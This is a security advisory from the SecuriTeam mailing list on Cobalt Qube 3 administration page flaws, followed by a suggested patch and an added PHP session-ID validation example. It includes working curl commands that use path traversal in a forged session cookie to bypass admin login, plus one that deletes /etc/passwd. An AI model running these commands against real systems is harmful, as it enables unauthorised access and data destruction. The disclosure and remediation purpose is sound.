[UNIX] Cobalt Qube 3 Administration Page Insecurity

From: support@securiteam.com
Date: 07/25/02


From: support@securiteam.com
To: list@securiteam.com
Date: Thu, 25 Jul 2002 12:05:17 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
  Cobalt Qube 3 Administration Page Insecurity
------------------------------------------------------------------------

SUMMARY

Several security vulnerabilities have been found in the Cobalt Qube 3
product. They allow an attacker to bypass the authentication mechanism,
gain administrative privileges, and delete any file they want.

DETAILS

Vulnerable systems:
Cobalt Qube 3 release 6.0 (Kernel 2.2.16C7)

Problem 1: Local Privilege Escalation to Admin
Any user with the ability to create a file in any location on a Cobalt
server can promote themselves to Admin access of the System Management. A
user may create a file such as /tmp/test and construct a cookie to log in
as Admin without a password:

Create a dummy session file on the Cobalt server:

$ printf "admin" > /tmp/test

Log in without a password from anywhere:

$ curl -b sessionId=/../../../../../../tmp/test\;loginName=admin \
    http://192.168.0.1:444/splashAdmin.php

Problem 2: Remote User access
By using the account name of a newly created user, we can bypass
authentication without needing to create a dummy session file on the
server:

$ curl -b sessionId=../codb/objects/4/.name\;loginName=admin \
    http://192.168.0.1:444/splashAdmin.php

Problem 3: Remotely delete files
It is possible to delete a file from the server by specifying the path to
the file and the first 31 characters of the file. The following example
will delete the /etc/passwd file from the server:

$ curl -b sessionId=../../../../../../../../etc/passwd\;loginName=root:x:0:0:root:/root:/bin/bash \
    http://192.168.0.1:444/splashAdmin.php

Quick Solution:
Modify file /usr/sausalito/ui/libPhp/ServerScriptHelper.php:

line 64:
$sessionId = ereg_replace("\.\.","",$sessionId);
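
An allow-list check on the cookie value, followed by a containment check on the resolved path, rejects all three cookie values shown above without relying on substring stripping. The following is an added example, not part of the original advisory or of the Cobalt code; the function name, the session directory and the ID format (16 to 64 alphanumeric characters) are assumptions.

```php
<?php
// Added example: hypothetical helper, not code from ServerScriptHelper.php.
// SESSION_DIR and the ID format are assumptions; the advisory gives neither.
const SESSION_DIR = '/var/lib/example-sessions';   // placeholder path

/**
 * Return the absolute session file path for $sessionId, or null if the
 * value is not a well-formed ID or resolves outside $baseDir.
 */
function resolveSessionFile(string $sessionId, string $baseDir = SESSION_DIR): ?string
{
    // 1. Allow-list: reject anything that is not a plain token, rather
    //    than removing "bad" substrings such as "..".
    if (preg_match('/\A[A-Za-z0-9]{16,64}\z/', $sessionId) !== 1) {
        return null;
    }

    // 2. Canonicalise and confirm containment. realpath() resolves
    //    symlinks and returns false when the file does not exist.
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . $sessionId);
    if ($base === false || $path === false) {
        return null;
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Constructed demo: a temp directory stands in for the session store.
$dir = sys_get_temp_dir() . '/sessdemo_' . getmypid();
mkdir($dir);
$good = str_repeat('a1B2', 8);            // constructed 32-character ID
file_put_contents("$dir/$good", 'admin');

$cases = [
    $good,                                 // well-formed ID with a session file
    '/../../../../../../tmp/test',         // cookie value from Problem 1
    '../codb/objects/4/.name',             // cookie value from Problem 2
    '../../../../../../../../etc/passwd',  // cookie value from Problem 3
];
foreach ($cases as $id) {
    $r = resolveSessionFile($id, $dir);
    printf("%-40s => %s\n", $id, $r === null ? 'rejected' : 'accepted');
}
unlink("$dir/$good");
rmdir($dir);
```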

ADDITIONAL INFORMATION

The information has been provided by
pokleyzz <pokleyzz@scan-associates.net>,
sk <sk@scan-associates.net>, and
shaharil <shaharil@scan-associates.net>.
